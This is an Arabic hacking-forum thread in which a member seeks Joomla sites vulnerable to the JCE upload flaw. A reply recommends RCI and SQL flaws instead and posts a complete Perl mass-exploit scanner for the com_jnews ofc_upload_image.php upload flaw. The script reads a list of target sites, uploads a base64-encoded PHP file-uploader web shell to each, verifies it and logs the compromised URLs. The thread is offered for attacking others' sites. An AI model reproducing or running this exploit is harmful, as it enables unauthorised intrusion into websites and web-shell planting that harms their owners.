1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. Erorr Salawi 404
    DeveloPer Plus

    عضو منذ:
    ‏7 يوليو 2014
    عدد المشاركات:
    101
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    اللغة البرمجية:
    Visual Basic
    Facebook:
    ممكن مواقع جوملة مصابة بتغرة jce لانني لم اجدها وايضا الدوركات لا تعمل بدون جدوا
     
    جاري تحميل الصفحة...
  2. Pro.Mast3r
    V • I • P

    عضو منذ:
    ‏13 يوليو 2014
    عدد المشاركات:
    110
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    50
    الوظيفة:
    Pentester
    الإقامة:
    Dev/null
    نظام التشغيل:
    windows 8.1
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    اخي

    • اولا : الموضوع في القسم الخطأ .

    • ثانيا : ثغره jce انقرضت وحتى لو وجدت في موقع ماتكدر ترفع ملف .PHP

    • حاول تجد ثغرات اخرى مثل RCI , SQL .
     
  3. TeePlow
    V • I • P

    عضو منذ:
    ‏12 مارس 2014
    عدد المشاركات:
    372
    الإعجابات المتلقاة:
    10
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    السلام عليكم
    ينقل للقسم الصحيح
    ثانيا مثل ما قال الاخ :
    ثغره jce انقرضت وحتى لو وجدت في موقع ماتكدر ترفع ملف .PHP
     
  4. Erorr Salawi 404
    DeveloPer Plus

    عضو منذ:
    ‏7 يوليو 2014
    عدد المشاركات:
    101
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    اوكي وكيف استغل تغرة rci
     
  5. Pro.Mast3r
    V • I • P

    عضو منذ:
    ‏13 يوليو 2014
    عدد المشاركات:
    110
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    50
    الوظيفة:
    Pentester
    الإقامة:
    Dev/null
    نظام التشغيل:
    windows 8.1
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    اخي ثغرات عباره عن استغلال امري
    يعني تستطيع تنفيذ امر عن طريقها
    ومايفيدك هو امر الاستدعاء
    wget

    والثغره منتشره في اضافات الجوملا

    مثل

    • com_jnewsletter
    هذه اداه بيرل
    لااستغلال الثغره
    كود PHP:
    #!/usr/bin/perl
    # Module Needed :)
    use strict;
    no warnings;
    use 
    threads;
    use 
    threads::shared;
    use 
    LWP::UserAgent;
    use 
    HTTP::Request;
    use 
    LWP::Simple;
    use 
    HTTP::Request::Common;
    use 
    Term::ANSIColor;
    use 
    Win32::Console::ANSI;
    use 
    MIME::Base64;
    ##############################
    if($^=~ /Win/){
    system("cls");
    }else{
    system("clear");
    }
    my $ua LWP::UserAgent->new;
    $ua->timeout(15);
    $ua->agent('Mozilla/5.0');
    print 
    color("bold red"),"[+] Com_jnews Joomla Components RCI Exploits Scanner (Threads on) \n";
    print 
    color("bold red"),"[+] coded by Mr_AnarShi-T\n";
    print 
    color("bold red"),"[+] Gr33T's : Boy Security & cold Zero & Dod & Normal & Orange man & all \n";
    print 
    color("bold red"),"[+] Home : Www.site.com & My Lab :) \n\n";
    print 
    color 'reset';
    print 
    color("green"),"[+] Enter File : ";
    print 
    color 'reset';
    my $file=<STDIN>;
    chomp($file);
    print 
    color("green"),"\n[+] Enter Thread Number : ";
    print 
    color 'reset';
    my $thread=<STDIN>;
    chomp($thread);
    my $threads $thread;
    my @linkz shared;
    my @paths shared;
    GetLinks();
    while (
    threads->list) {}
    print 
    color ('green');
    print 
    "\n[+] Link Founded : ";
    print 
    color 'reset';
    print
    "".scalar(@linkz)."\n\n";
    CheckLinks();
    while (
    threads->list) {}
    sub GetLinks {
    openLNK"$file) or die "$!\n";
    while( 
    definedmy $line_ = <LNK> ) ) {
    chomp$line_ );
    push( @linkz$line_ );
    }
    closeLNK );
    }
    sub CheckLinks {
    foreach 
    my $link( @linkz ) {
    my $ctr 0;
    foreach 
    my $thr threads->list ) { $ctr++; }
    if (
    $ctr $threads){
    threads->create( \&CheckLinkz_exploits,$link );
    }
    else { 
    redo; }
    }
    }
    sub CheckLinkz_exploits {
    my $link shift ;
    chomp ($link);
    my $site_vul "http://".$link "/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=m-a.php";
    my $encoded "PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgTXJfQW5hclNoaS1UIDwvdGl0bGU+JzsNCmVj​aG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRh​dGEiIG5hbWU9InVwbG9hZGVyDQoiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJm​aWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIN​CmlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAi​VXBsb2FkIiApIHsNCiAgICAgICAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAk​X0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnDQo8Yj5VcGxvYWQgQ29tcGxhdGUgISEhPC9i​Pjxicj48YnI+JzsgfQ0KICAgICAgICBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWxlZCAhISE8L2I+​PGJyPjxicj4nOyB9DQp9DQo/Pg==";
    my $evil decode_base64($encoded);
    my $res $ua->request(POST $site_vul,Content_Type => 'text/plain'Content => $evil);
    print 
    "[+] Checking $link\n\n";
    if (
    $res->is_success){
    print 
    "[+] $link is vul\n";
    print 
    "[+] Checking If The Evil code Was Uploded\n";
    my $vul="/components/com_jnews/includes/openflashchart/tmp-upload-images/m-a.php";
    my $url "http://".$link$vul;
    my $request HTTP::Request->new(GET=>$url);
    my $useragent LWP::UserAgent->new();
    my $response $useragent->request($request);
    if (
    $response->content=~m/<title>Upload Files Mr_AnarShi-<\/title>/g){
    print 
    color("yellow"),"[.] Found => $url\n\n";
    print 
    color 'reset';
    open(BEN,">>result-$link.txt");
    print 
    BEN "$url\n";
    close(BEN);
    }
    else
    {
    print 
    "[.] Not Found \n";
    }
    }
    threads->detach();
    موفق .~
     
  6. sєиɪσя нσssαм ★ Abu Nabil ★
    V • I • P

    عضو منذ:
    ‏11 يوليو 2014
    عدد المشاركات:
    171
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    50
    الإقامة:
    فــ ـي قـ ـ لـ ـ و بــ كـم
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    يتم آختيآر آفضل رد لعدم آهتمآم العضو بآلطلب المطروح
    بعد آذن الجميع يغلق الموضوع للآنتهآء
    )5:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...